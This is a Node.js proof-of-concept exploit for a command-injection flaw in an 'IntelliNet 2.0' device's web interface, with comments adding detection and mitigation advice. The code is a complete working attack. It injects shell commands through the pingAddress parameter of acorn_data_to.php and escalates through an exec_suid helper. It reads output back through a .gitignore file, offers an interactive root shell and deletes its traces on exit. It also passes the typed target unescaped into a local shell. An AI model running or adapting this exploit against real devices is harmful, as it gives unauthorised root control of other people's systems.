#!/usr/local/bin/node
//
// Proof-of-concept client for a command-injection flaw in the web interface of
// a device the banner below calls "IntelliNet 2.0".
//
// What the visible code does:
//   * Sends plain HTTP GET requests (through the local `curl` binary) to
//     /acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;<command>;
//     No credentials, cookies or tokens are attached to these requests.
//   * The `;` after the ping address is a shell command separator, so the
//     script depends on the device handing `pingAddress` to a shell without
//     validation or escaping (inferred from the request shape; the server-side
//     code is not shown here).
//   * Every command is prefixed with /usr/aes/bin/exec_suid and its output is
//     redirected into `.gitignore`, which is then downloaded from
//     http://<target>/.gitignore. This implies the ping handler runs with the
//     web root as its working directory (TODO confirm on the device).
//
// Defensive notes:
//   * Detection: web/access logs showing acorn_data_to.php with cmd=ping-tool
//     and a pingAddress containing `;` (or other shell metacharacters), and
//     GET requests for /.gitignore. The marker `a1b2c3d4` appears in the probe
//     request. A `.gitignore` file appearing in the web root is a host artefact.
//   * Mitigation: accept only a strictly validated IP address or hostname for
//     pingAddress, run ping with an argument vector instead of a shell string,
//     require authentication on the diagnostic endpoint, keep the management
//     interface off untrusted networks, and review who may run the exec_suid
//     helper.

const { execSync } = require('child_process');
const readline = require('readline');

// Mutable script-wide state, filled in from the interactive prompts below.
let TARGET = ''; // host/IP typed by the operator
let COMMAND = ''; // last command typed at the prompt
let SESSION = ''; // probe reply: marker `a1b2c3d4` followed by the remote $HOSTNAME

// Helper binary on the device that is prepended to every injected command.
// Presumably a setuid-root wrapper, judging by its name and the "root" banner —
// not verifiable from this file.
const ESCALATE = '/usr/aes/bin/exec_suid';

// Banner only; no functional effect.
console.log(` ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣧⣶⣶⣶⣦⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⣠⣾⢿⣿⣿⣿⣏⠉⠉⠛⠛⠿⣷⣕⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⣠⣾⢝⠄⢀⣿⡿⠻⣿⣄⠀⠀⠀⠀⠈⢿⣧⡀⣀⣤⡾⠀⠀⠀ ⠀⠀⠀⢰⣿⡡⠁⠀⠀⣿⡇⠀⠸⣿⣾⡆⠀⠀⣀⣤⣿⣿⠋⠁⠀⠀⠀⠀ ⠀⠀⢀⣷⣿⠃⠀⠀⢸⣿⡇⠀⠀⠹⣿⣷⣴⡾⠟⠉⠸⣿⡇⠀⠀⠀⠀⠀ ⠀⠀⢸⣿⠗⡀⠀⠀⢸⣿⠃⣠⣶⣿⠿⢿⣿⡀⠀⠀⢀⣿⡇⠀⠀⠀⠀⠀ ⠀⠀⠘⡿⡄⣇⠀⣀⣾⣿⡿⠟⠋⠁⠀⠈⢻⣷⣆⡄⢸⣿⡇⠀⠀⠀⠀⠀ ⠀⠀⠀⢻⣷⣿⣿⠿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠻⣿⣷⣿⡟⠀⠀⠀⠀⠀⠀ ⢀⣰⣾⣿⠿⣿⣿⣾⣿⠇⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣿⣅⠀⠀⠀⠀⠀⠀ ⠀⠰⠊⠁⠀⠙⠪⣿⣿⣶⣤⣄⣀⣀⣀⣤⣶⣿⠟⠋⠙⢿⣷⡄⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⢀⣿⡟⠺⠭⠭⠿⠿⠿⠟⠋⠁⠀⠀⠀⠀⠙⠏⣦⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⢸⡟⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ╔════════════════════════════════════════════╗ ║ IntelliNet 2.0 Remote Root Exploit (0-Day) ║ ║ Author: Jean Pereira <[email protected]> ║ ╚════════════════════════════════════════════╝ `);

// Removes the `.gitignore` output file on the device by injecting
// `rm .gitignore` through the same pingAddress parameter.
// Forensics: the file is only removed when the operator quits with `!q`; the
// HTTP request that removes it still shows up in the access log.
const cleanUp = () => {
  // NOTE(review): TARGET is pasted into a local shell command line unescaped,
  // so whatever was typed at the "target IP" prompt is also parsed by the
  // shell on the machine running this script.
  execSync(
    `curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;rm%20.gitignore;"`
  );
};

// Runs `cmd` on the device and returns its trimmed output as a string.
//
// Request 1 injects `<ESCALATE> <cmd> > .gitignore` after the ping address;
// the command text is passed through encodeURIComponent, and `%20%3E%20` is
// the URL-encoded ` > ` redirect. Request 2 downloads the resulting file.
// Both calls are synchronous and block until curl exits.
const createShell = (cmd) => {
  execSync(
    `curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;${encodeURIComponent(
      [ESCALATE, cmd].join(' ')
    )}%20%3E%20.gitignore;"`
  );
  return execSync(`curl -sL "http://${TARGET}/.gitignore"`).toString().trim();
};

// Single readline interface shared by the target prompt and the command loop.
const rl = readline.createInterface({
  input: process.stdin,
  output: process.stdout,
});

// Prompt loop: reads one line, forwards it via createShell(), prints the
// result and re-arms itself. The literal input `!q` triggers cleanUp() and
// closes the interface, which ends the process (see the 'close' handler).
const interactiveShell = () => {
  // SESSION.slice(8) drops the 8-character marker, leaving the remote hostname.
  rl.question(`root@${SESSION.slice(8)}:~# `, (currentCommand) => {
    if (currentCommand.trim() === '!q') {
      console.log('Cleaning up...');
      cleanUp();
      rl.close();
    } else {
      COMMAND = currentCommand;
      let output = createShell(COMMAND);
      console.log(output);
      interactiveShell();
    }
  });
};

// Entry point: ask for the target, then probe it.
rl.question('[*] Enter target IP: ', (targetIP) => {
  TARGET = targetIP;
  // Probe: the reply must start with the fixed marker, which shows that the
  // injected command ran and that its output file is readable over HTTP.
  SESSION = createShell('echo a1b2c3d4$HOSTNAME');
  if (!SESSION.startsWith('a1b2c3d4')) {
    console.log('[*] Could not execute payload, aborting');
    // Exits with status 0 even though the probe failed.
    process.exit(0);
  } else {
    console.log('[*] Payload injected to firmware');
    console.log('[*] Launching root shell via exec_suid');
  }
  console.log('');
  interactiveShell();
});

// Closing the readline interface (via `!q` or end of input) ends the process.
rl.on('close', () => {
  process.exit(0);
});